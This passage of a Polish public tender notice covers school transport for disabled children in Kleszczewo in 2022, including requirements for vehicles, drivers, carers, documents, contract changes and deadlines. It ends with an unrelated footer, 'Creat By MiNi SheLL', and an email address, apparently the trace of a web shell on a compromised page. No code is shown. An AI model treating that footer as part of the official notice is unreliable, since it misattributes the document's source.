miejsc<br/>siedzących<br/>10-14 + 1 wyposażonymi w pasy bezpieczeństwa, wszystkie pojazdy muszą być sprawne i<br/>posiadać ważne przeglądy techniczne. Ponadto muszą posiadać ważne polisy OC i NW.<br/>Zamawiający uzna, za spełniony powyższy warunek, jeżeli Wykonawca w wykazie pojazdów<br/>niezbędnych do realizacji zamówienia, zgodnie ze wzorem stanowiącym załącznik nr 6 do oferty,<br/>poda informacje spełniające wymogi Zamawiającego, dotyczące:<br/>- ilości miejsc siedzących dla 2 samochodów po min. 19+1<br/>- wyposażenia miejsc siedzących w pasy bezpieczeństwa – obowiązkowo<br/>- nr polisy OC, NW oraz data jej ważności<br/>- daty ważności przeglądu technicznego pojazdu<br/>- charakteru własności pojazdu (własny, leasing, inne)<br/>1.4.3. Zamawiający wymaga, aby Wykonawca dysponował:- minimum 2 kierowcami, którzy muszą posiadać następujące uprawnienia: prawo jazdy kategorii<br/>uprawniającej do kierowania niezbędnymi do wykonania zamówienia pojazdami oraz ważne<br/>orzeczenia lub zaświadczenia: lekarza medycyny pracy i psychologa;<br/>- minimum 2 opiekunami, którzy muszą posiadać odpowiednie przygotowanie zawodowe do<br/>opieki nad dziećmi niepełnosprawnymi: ukończony odpowiedni: kurs, szkołę, uczelnię itp., które<br/>dają uprawnienia do pełnienia funkcji opiekuna w czasie przewozu dzieci niepełnosprawnych.<br/>Każdy opiekun dla dzieci będzie miał pieczę nad nimi zarówno w czasie jazdy, jak i przy<br/>wsiadaniu i wysiadaniu z pojazdów.<br/>Zamawiający uzna za spełniony powyższy warunek, jeżeli Wykonawca w zakresie<br/>dysponowania osobami przedstawi wykaz, złoży oświadczenie o posiadaniu uprawnień przez te<br/>osoby. Wykaz osób, którymi Wykonawca dysponuje lub będzie dysponował, a które będą<br/>uczestniczyć w wykonywaniu zamówienia musi zawierać informacje na temat ich kwalifikacji<br/>zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także<br/>zakresu wykonywanych przez nie czynności oraz informację o podstawie do dysponowania tymi<br/>osobami.<br/>Wzór wykazu wraz z oświadczeniem, że wskazane w wykazie osoby posiadają wymagane<br/>uprawnienia stanowi załącznik nr 5 do SWZ.<br/>Za zgodą Zamawiającego, w uzasadnionych sytuacjach zarówno przed udzieleniem zamówienia<br/>jak i trakcie realizacji zamówienia, dopuszcza się możliwość zmian osobowych, po dostarczeniu<br/>odpowiednich dokumentów oraz przy spełnieniu określonych do przedmiotowego postępowania<br/>wymagań. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">4. Oświadczenie o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 w<br/>zakresie podstaw wykluczenia, o których mowa w punkcie XIV SWZ– wg załącznika nr 9 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. w celu potwierdzenia, że Wykonawca posiada kompetencje lub<br/>uprawnienia do wykonywania działalności lub czynności, związanych z realizacją przedmiotu<br/>zamówienia – Zamawiający wymaga aktualnej licencji na wykonywanie krajowego transportu<br/>drogowego w zakresie przewozu osób na terenie Polski.<br/>2. na potwierdzenie zdolności technicznej lub zawodowej, - wykaz wykonanych usług wykonanych w okresie ostatnich 3 lat przed upływem terminu składania<br/>ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie wraz z podaniem ich<br/>przedmiotu wraz z podaniem jej rodzaju i wartości, daty i lokalizacji, oraz załączeniem dowodów<br/>określających czy te usługi zostały wykonane należycie, przy czym dowodami, o których mowa, są<br/>referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego dostawy były<br/>wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w<br/>stanie uzyskać tych dokumentów - oświadczenie wykonawcy (załącznik nr 4 do SWZ)<br/>W przypadku, gdy Zamawiający jest podmiotem, na rzecz którego usługi wskazane w wykazie zostały<br/>wcześniej wykonane, Wykonawca nie ma obowiązku przedkładania dowodów.<br/>- wykaz niezbędnych do wykonania zamówienia pojazdów wraz z odpowiednim opisem (wg wzoru –<br/>zał. nr 6 do SWZ): numery dowodów rejestracyjnych samochodów z datą ważności przeglądu<br/>technicznego pojazdu oraz z podaniem odpowiedniej ilości miejsc siedzących, ilości miejsc dla wózków<br/>składanych oraz podaniem daty ważności polisy OC i NW.<br/>- wykazu osób (wg wzoru – zał. nr 5 do SWZ), które będą uczestniczyć w wykonywaniu zamówienia, w<br/>szczególności odpowiedzialnych za świadczenie usług z informacjami na temat ich kwalifikacji<br/>zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu<br/>wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami<br/>3. W celu potwierdzenia, że Wykonawca znajduje się w sytuacji ekonomicznej i finansowej<br/>zapewniającej wykonanie zamówienia, Zamawiający żąda następujących dokumentów:<br/>polisy lub innego dokumentu ubezpieczenia potwierdzającego, że Wykonawca jest ubezpieczony od<br/>odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na minimum 100.000zł,<br/>4. Oświadczenie o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 w<br/>zakresie podstaw wykluczenia, o których mowa w punkcie XIV SWZ– wg załącznika nr 9 do SWZ.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 15.1. Formularz ofertowy - według wzoru stanowiącego załącznik nr 1 do SWZ wraz z<br/>kosztorysem ofertowym stanowiącym załącznik nr 10 do SWZ.<br/>15.2. Oświadczenie Wykonawcy o niepodleganiu wykluczeniu z postępowania – w przypadku<br/>wspólnego ubiegania się o zamówienie, oświadczenie o niepodleganiu wykluczeniu składa<br/>każdy z Wykonawców; (według wzoru stanowiącego załącznik nr 2 do SWZ),<br/>15.3. Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu – w przypadku<br/>wspólnego ubiegania się o zamówienie, oświadczenie o spełnieniu warunków udziału, składa<br/>każdy z Wykonawców w zakresie prac, które będzie wykonywał (według wzoru stanowiącego<br/>załącznik nr 3 do SWZ);<br/>15.4. Pełnomocnictwo upoważniające do złożenia oferty, o ile ofertę składa pełnomocnik;<br/>15.5. Pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia - dotyczy ofert składanych przez<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia;<br/>15.7. Oświadczenie, z którego wynika, które prace będą wykonywane przez poszczególnych<br/>wykonawców – w przypadku wspólnego ubiegania się o udzielenie zamówienia;<br/>15.8. Oświadczenie podmiotu udostępniającego zasoby – jeżeli dotyczy (według wzoru<br/>stanowiącego<br/>załącznik nr 8 do SWZ). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>19.2. Wykonawcy składający ofertę wspólną ustanawiają pełnomocnika do reprezentowania ich<br/>w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia<br/>umowy w sprawie zamówienia publicznego.<br/>19.3. Pełnomocnictwo musi zostać dołączone do oferty.<br/>19.4. Pełnomocnik pozostaje w kontakcie z Zamawiającym w toku postępowania i do niego<br/>Zamawiający kieruje informacje, korespondencję, itp.<br/>19.5. Wykonawcy składający ofertę wspólną dołączają do oferty oświadczenie, z którego wynika,<br/>które prace wykonują poszczególni wykonawcy.<br/>19.6. Każdy z Wykonawców składa we własnym imieniu oświadczenia i dokumenty<br/>potwierdzające brak podstaw do wykluczenia z postępowania (Załącznik nr 2 do SWZ) oraz<br/>spełnienie warunków udziału w postępowaniu w zakresie, w którym będzie realizował roboty<br/>budowlane (Załącznik nr 3 do SWZ).<br/>19.7. Przed podpisaniem umowy (w przypadku wygrania postępowania) Wykonawcy składający<br/>ofertę wspólną będą mieli obowiązek przedstawić Zamawiającemu umowę konsorcjum,<br/>zawierającą co najmniej:<br/>a) zobowiązanie do realizacji wspólnego przedsięwzięcia gospodarczego obejmującego swoim<br/>zakresem realizację przedmiotu zamówienia i określające zakres działania poszczególnych<br/>stron umowy,<br/>b) czas obowiązywania umowy, który nie może być krótszy, niż okres obejmujący realizację<br/>zamówienia oraz czas trwania gwarancji jakości i rękojmi. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zamawiający dopuszcza możliwość wprowadzenia zmiany treści umowy, w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w szczególności w zakresie: <br/>1)	Zmiany terminu końcowego w przypadku:<br/>a)	wystąpienia siły wyższej, rozumianej jako zdarzenie niemożliwe do przewidzenia, na które Strony nie mają wpływu i są przez Strony niemożliwe do pokonania, <br/>a w szczególności: klęski żywiołowe, wojny, zamknięcie granic uniemożliwiające wykonanie umowy w całości lub w części, pod warunkiem dostarczenia w terminie 5 dni od dnia zaistnienia siły wyższej, przez Stronę dotkniętą wystąpieniem siły wyższej, dokumentu potwierdzającego zaistnienie siły wyższej wystawionego przez właściwy organ administracji publicznej oraz wskazania wpływu zdarzenia na wykonanie umowy;<br/>b)	zmiany okresu trwania roku szkolnego 2022/2023 - pod warunkiem podpisania przez Zamawiającego i Wykonawcę porozumienia w sprawie zmiany terminu;<br/>2)	Zakresu przedmiotu umowy w przypadku:<br/>a)	rezygnacji przez Zamawiającego z wykonania części przedmiotu umowy w razie uznania ich wykonania za zbędne, czego nie można było wcześniej przewidzieć do wysokości 25% wartości zamówienia podstawowego,<br/>b)	w którym nastąpi konieczność wykonania dodatkowych usług, Zamawiający dopuszcza możliwość zrealizowania większego zakresu przedmiotu zamówienia wraz z odpowiednim zwiększeniem wynagrodzenia umownego, jednak nie przekraczającego 25% wartości zamówienia podstawowego.<br/>3)	Zmiany wysokości wynagrodzenia:<br/>a)	w przypadku zmiany wysokości podatku VAT w stopniu i terminie odpowiadającym tym zmianom i/lub wystąpienia okoliczności wskazanych w § 8 ust. 2;<br/>b)	na podstawie rzeczywistego wykonania umowy (wynagrodzenie kosztorysowe) w okresie obowiązywania umowy;<br/>4)	Zmiany osoby (osób) uczestniczących w realizacji zamówienia, pod warunkiem uzyskania zgody Zamawiającego, na zasadach określonych w Specyfikacji Istotnych Warunków Zamówienia.<br/>5)	Zmiany pojazdów wykazanych do realizacji zamówienia, pod warunkiem uzyskania zgody Zamawiającego, na zasadach określonych w Specyfikacji Istotnych Warunków Zamówienia.<br/>6)	Zamiany lub pracowników, pod warunkiem uzyskania zgody Zamawiającego, na zasadach określonych w Specyfikacji Istotnych Warunków Zamówienia.<br/>2.	Jakiekolwiek zmiany umowy wymagają zgody obu stron oraz pod rygorem nieważności – zachowania formy pisemnej w postaci aneksu do umowy, z wyjątkiem:<br/>1)	zmiany personelu po stronie Zamawiającego lub Wykonawcy, w wyniku zmian organizacyjnych,<br/>2)	zmiany wartości umowy z uwagi: <br/>a)	na ustawową zmianę stawki podatku VAT;<br/>b)	na rzeczywiste wykonanie umowy;<br/>3)	zmiany adresu do korespondencji. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-07-28 07:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/kleszczewo</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-07-28 07:45</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-08-26</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Stosownie do art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego z postępowania o udzielenie zamówienia wyklucza się:<br/>1) wykonawcę wymienionego w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisanego na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 w/w ustawy;<br/>2) wykonawcę, którego beneficjentem rzeczywistym w rozumieniu ustawy z dnia 1 marca 2018 r. o przeciwdziałaniu praniu pieniędzy oraz finansowaniu terroryzmu (Dz. U. z 2022 r. poz. 593 i 655) jest osoba wymieniona w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisana na listę lub będąca takim beneficjentem rzeczywistym od dnia 24 lutego 2022 r., o ile została wpisana na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 w/w ustawy;<br/>3) wykonawcę, którego jednostką dominującą w rozumieniu art. 3 ust. 1 pkt 37 ustawy z dnia 29 września 1994 r. o rachunkowości (Dz. U. z 2021 r. poz. 217, 2105 i 2106) jest podmiot wymieniony w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisany na listę lub będący taką jednostką dominującą od dnia 24 lutego 2022 r., o ile został wpisany na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 w/w ustawy.

Creat By MiNi SheLL
Email: jattceo@gmail.com